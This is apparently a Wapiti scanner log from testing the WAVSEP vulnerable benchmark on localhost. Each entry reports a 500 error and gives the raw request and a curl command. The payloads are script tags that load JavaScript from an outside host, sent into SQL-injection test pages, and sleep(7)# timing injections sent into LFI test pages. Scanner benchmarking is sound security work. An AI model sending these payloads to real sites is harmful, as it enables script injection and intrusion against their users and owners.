curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case08-InjectionInCalc-Numeric-BooleanExploit-WithErrors.jsp" -e "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case08-InjectionInCalc-Numeric-BooleanExploit-WithErrors.jsp" -d "minBalanace=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwr5gjtzfogz.js%3E%3C%2Fscript%3E"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter msgid
POST /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case09-InjectionInUpdate-Numeric-CommandInjection-WithErrors.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case09-InjectionInUpdate-Numeric-CommandInjection-WithErrors.jsp Content-Type: application/x-www-form-urlencoded msgid=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fw8xfzbeq2bz.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case09-InjectionInUpdate-Numeric-CommandInjection-WithErrors.jsp" -e "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case09-InjectionInUpdate-Numeric-CommandInjection-WithErrors.jsp" -d "msgid=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fw8xfzbeq2bz.js%3E%3C%2Fscript%3E"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter orderby
POST /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case10-InjectionInSearchOrderBy-Numeric-BinaryDeliberateRuntimeError-WithErrors.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case10-InjectionInSearchOrderBy-Numeric-BinaryDeliberateRuntimeError-WithErrors.jsp Content-Type: application/x-www-form-urlencoded orderby=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwgy6xooh5xz.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case10-InjectionInSearchOrderBy-Numeric-BinaryDeliberateRuntimeError-WithErrors.jsp" -e "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case10-InjectionInSearchOrderBy-Numeric-BinaryDeliberateRuntimeError-WithErrors.jsp" -d "orderby=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwgy6xooh5xz.js%3E%3C%2Fscript%3E"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter transactionDate
POST /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case15-InjectionInSearch-DateWithoutQuotes-UnionExploit-WithErrors.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case15-InjectionInSearch-DateWithoutQuotes-UnionExploit-WithErrors.jsp Content-Type: application/x-www-form-urlencoded transactionDate=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwbv8dxjmpuz.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case15-InjectionInSearch-DateWithoutQuotes-UnionExploit-WithErrors.jsp" -e "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case15-InjectionInSearch-DateWithoutQuotes-UnionExploit-WithErrors.jsp" -d "transactionDate=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwbv8dxjmpuz.js%3E%3C%2Fscript%3E"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter transactionId
POST /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case16-InjectionInView-NumericWithoutQuotes-PermissionBypass-WithErrors.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case16-InjectionInView-NumericWithoutQuotes-PermissionBypass-WithErrors.jsp Content-Type: application/x-www-form-urlencoded transactionId=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fw681z6hlgmz.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case16-InjectionInView-NumericWithoutQuotes-PermissionBypass-WithErrors.jsp" -e "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case16-InjectionInView-NumericWithoutQuotes-PermissionBypass-WithErrors.jsp" -d "transactionId=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fw681z6hlgmz.js%3E%3C%2Fscript%3E"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter msgId
POST /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case17-InjectionInSearch-NumericWithoutQuotes-UnionExploit-WithErrors.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case17-InjectionInSearch-NumericWithoutQuotes-UnionExploit-WithErrors.jsp Content-Type: application/x-www-form-urlencoded msgId=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fw2esdj39i8z.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case17-InjectionInSearch-NumericWithoutQuotes-UnionExploit-WithErrors.jsp" -e "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case17-InjectionInSearch-NumericWithoutQuotes-UnionExploit-WithErrors.jsp" -d "msgId=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fw2esdj39i8z.js%3E%3C%2Fscript%3E"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter minBalanace
POST /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case18-InjectionInCalc-NumericWithoutQuotes-BooleanExploit-WithErrors.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case18-InjectionInCalc-NumericWithoutQuotes-BooleanExploit-WithErrors.jsp Content-Type: application/x-www-form-urlencoded minBalanace=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwuyvjckekfz.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case18-InjectionInCalc-NumericWithoutQuotes-BooleanExploit-WithErrors.jsp" -e "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case18-InjectionInCalc-NumericWithoutQuotes-BooleanExploit-WithErrors.jsp" -d "minBalanace=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fwuyvjckekfz.js%3E%3C%2Fscript%3E"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter msgid
POST /wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case19-InjectionInUpdate-NumericWithoutQuotes-CommandInjection-WithErrors.jsp HTTP/1.1 Host: 127.0.0.1:8090 Referer: http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case19-InjectionInUpdate-NumericWithoutQuotes-CommandInjection-WithErrors.jsp Content-Type: application/x-www-form-urlencoded msgid=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fw1qfycrkswz.js%3E%3C%2Fscript%3E
curl "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case19-InjectionInUpdate-NumericWithoutQuotes-CommandInjection-WithErrors.jsp" -e "http://127.0.0.1:8090/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case19-InjectionInUpdate-NumericWithoutQuotes-CommandInjection-WithErrors.jsp" -d "msgid=%3Cscript%20src%3Dhttps%3A%2F%2Fwapiti3.ovh%2Fw1qfycrkswz.js%3E%3C%2Fscript%3E"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case01-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=sleep%287%29%231 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case01-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=sleep%287%29%231"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case02-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-AnyPathReq-Read.jsp?target=sleep%287%29%231 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case02-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-AnyPathReq-Read.jsp?target=sleep%287%29%231"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case03-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultRelativeInput-AnyPathReq-Read.jsp?target=sleep%287%29%231 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case03-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultRelativeInput-AnyPathReq-Read.jsp?target=sleep%287%29%231"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case05-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-AnyPathReq-Read.jsp?target=sleep%287%29%231 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case05-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-AnyPathReq-Read.jsp?target=sleep%287%29%231"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case06-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-AnyPathReq-Read.jsp?target=sleep%287%29%231 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case06-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-AnyPathReq-Read.jsp?target=sleep%287%29%231"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case07-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-AnyPathReq-Read.jsp?target=sleep%287%29%231 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case07-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-AnyPathReq-Read.jsp?target=sleep%287%29%231"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case08-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-AnyPathReq-Read.jsp?target=sleep%287%29%231 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case08-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-AnyPathReq-Read.jsp?target=sleep%287%29%231"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case09-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=sleep%287%29%231 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case09-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=sleep%287%29%231"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case10-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-NoPathReq-Read.jsp?target=sleep%287%29%231 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case10-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-NoPathReq-Read.jsp?target=sleep%287%29%231"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case11-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-NoPathReq-Read.jsp?target=sleep%287%29%231 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case11-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-NoPathReq-Read.jsp?target=sleep%287%29%231"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case12-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-NoPathReq-Read.jsp?target=sleep%287%29%231 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case12-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-NoPathReq-Read.jsp?target=sleep%287%29%231"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=sleep%287%29%231 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=sleep%287%29%231"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=sleep%287%29%231 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=sleep%287%29%231"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=sleep%287%29%231 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case16-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-SlashPathReq-Read.jsp?target=sleep%287%29%231"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=sleep%287%29%231 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=sleep%287%29%231"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=sleep%287%29%231 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case18-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-SlashPathReq-Read.jsp?target=sleep%287%29%231"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp?target=sleep%287%29%231 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp?target=sleep%287%29%231"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=sleep%287%29%231 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case22-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-BackslashPathReq-Read.jsp?target=sleep%287%29%231"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case23-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-BackslashPathReq-Read.jsp?target=sleep%287%29%231 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case23-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-BackslashPathReq-Read.jsp?target=sleep%287%29%231"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case25-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=sleep%287%29%231 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case25-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=sleep%287%29%231"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case26-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-AnyPathReq-Read.jsp?target=sleep%287%29%231 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case26-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-AnyPathReq-Read.jsp?target=sleep%287%29%231"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case27-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-AnyPathReq-Read.jsp?target=sleep%287%29%231 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case27-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-AnyPathReq-Read.jsp?target=sleep%287%29%231"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case28-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=sleep%287%29%231 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case28-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=sleep%287%29%231"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case29-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-NoPathReq-Read.jsp?target=sleep%287%29%231 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case29-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-NoPathReq-Read.jsp?target=sleep%287%29%231"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case30-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-NoPathReq-Read.jsp?target=sleep%287%29%231 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case30-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-NoPathReq-Read.jsp?target=sleep%287%29%231"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case31-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=sleep%287%29%231 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case31-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=sleep%287%29%231"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case32-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=sleep%287%29%231 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case32-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=sleep%287%29%231"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case33-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp?target=sleep%287%29%231 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case33-LFI-ContextStream-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp?target=sleep%287%29%231"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case37-LFI-FileClass-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=sleep%287%29%231 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case37-LFI-FileClass-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=sleep%287%29%231"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case38-LFI-FileClass-FilenameContext-BackslashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=sleep%287%29%231 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case38-LFI-FileClass-FilenameContext-BackslashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=sleep%287%29%231"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=sleep%287%29%231 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case39-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=sleep%287%29%231"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=sleep%287%29%231 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=sleep%287%29%231"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=sleep%287%29%231 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=sleep%287%29%231"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case45-LFI-ContextStream-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=sleep%287%29%231 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case45-LFI-ContextStream-FilenameContext-SlashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=sleep%287%29%231"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case46-LFI-ContextStream-FilenameContext-BackslashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=sleep%287%29%231 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case46-LFI-ContextStream-FilenameContext-BackslashTraversalValidation-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=sleep%287%29%231"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case47-LFI-ContextStream-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=sleep%287%29%231 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case47-LFI-ContextStream-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=sleep%287%29%231"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case50-LFI-ContextStream-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=sleep%287%29%231 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case50-LFI-ContextStream-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=sleep%287%29%231"
The server responded with a 500 HTTP error code while attempting to inject a payload in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case51-LFI-ContextStream-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=sleep%287%29%231 HTTP/1.1 Host: 127.0.0.1:8090
